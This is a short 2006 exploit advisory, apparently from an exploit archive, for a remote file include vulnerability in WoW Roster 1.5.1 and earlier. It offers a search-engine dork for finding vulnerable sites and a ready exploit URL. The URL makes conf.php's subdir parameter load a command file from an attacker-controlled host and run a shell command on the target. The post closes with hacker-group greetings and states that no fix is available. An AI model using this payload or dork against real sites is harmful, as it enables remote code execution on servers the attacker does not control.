WoW Roster <= 1.5.1 (subdir) Remote File Include Vulnerability

2006-08-01 00:00:00

--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
-----------------------------------------------------------------------------

dork : "wow roster version 1.5.*"
Exploit :
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls

------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------

Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com

--------------------------------- [ eof ] ---------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.